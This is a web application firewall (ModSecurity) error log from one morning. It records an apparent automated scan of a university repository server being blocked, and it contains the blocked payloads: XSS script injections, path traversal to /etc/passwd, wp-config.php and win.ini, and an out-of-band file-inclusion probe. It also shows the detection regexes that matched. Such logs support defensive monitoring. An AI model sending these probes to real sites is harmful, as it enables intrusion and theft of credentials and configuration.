[Tue Aug 29 11:54:27.582321 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAoGFmQAAAAE"]
[Tue Aug 29 11:54:29.826264 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAqRzCAAAAAM"]
[Tue Aug 29 11:54:31.544845 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16B8Co-f0AAAnHQyEAAAAT"]
[Tue Aug 29 11:54:31.670271 2023] [:error] [pid 2659] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAApjIN8AAAAm"]
[Tue Aug 29 11:54:32.967455 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAApmXvUAAAAp"]
[Tue Aug 29 11:54:33.558772 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAApV220AAAAJ"]
[Tue Aug 29 11:54:34.559902 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAApk-WEAAAAn"]
[Tue Aug 29 11:54:35.540640 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16C8Co-f0AAAqTvjoAAAAa"]
[Tue Aug 29 11:54:35.676411 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAApl@BEAAAAo"]
[Tue Aug 29 11:54:35.679851 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAAqTvjsAAAAa"]
[Tue Aug 29 11:54:37.985688 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DcCo-f0AAApbUVYAAAAh"]
[Tue Aug 29 11:54:39.535260 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAApKayoAAAAZ"]
[Tue Aug 29 11:54:40.315442 2023] [:error] [pid 2634] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_8f66ab1d297e01ba5a0ba66947b86641a9909af6"): Internal error [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16D8Co-f0AAApKayoAAAAZ"]
[Tue Aug 29 11:54:40.539667 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAqdbm4AAAAw"]
[Tue Aug 29 11:54:41.579675 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAolKjUAAAAe"]
[Tue Aug 29 11:54:41.603919 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "repositoryfeb.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAqSwjwAAAAN"]
[Tue Aug 29 11:54:44.665706 2023] [:error] [pid 2704] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqQ@vkAAAAB"]
[Tue Aug 29 11:54:46.638528 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAqY57AAAAAr"]
[Tue Aug 29 11:54:47.612983 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAoz788AAAAS"]
[Tue Aug 29 11:54:50.588359 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAAqSwlAAAAAN"]
[Tue Aug 29 11:54:50.610360 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAApa-HsAAAAg"]
[Tue Aug 29 11:54:50.711499 2023] [:error] [pid 2717] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16GsCo-f0AAAqdbo4AAAAw"]
[Tue Aug 29 11:54:52.559072 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16HMCo-f0AAAqUB50AAAAb"]
[Tue Aug 29 11:54:52.599865 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqXySsAAAAq"]
[Tue Aug 29 11:54:54.412139 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqY58cAAAAr"]
[Tue Aug 29 11:54:55.726673 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqY588AAAAr"]
[Tue Aug 29 11:54:56.582566 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0ma7d3yedotw9b.oast.site found within TX:1: cjmnijtjmimvgniikdb0ma7d3yedotw9b.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16IMCo-f0AAAqSwmEAAAAN"]
[Tue Aug 29 11:54:56.599741 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAAqWwbMAAAAl"]
[Tue Aug 29 11:54:57.539335 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAApXgi4AAAAU"]
[Tue Aug 29 11:54:57.539384 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IcCo-f0AAApXgi4AAAAU"]
[Tue Aug 29 11:54:57.882522 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IcCo-f0AAApHRa8AAAAP"]
[Tue Aug 29 11:54:59.572173 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAApbUZwAAAAh"]
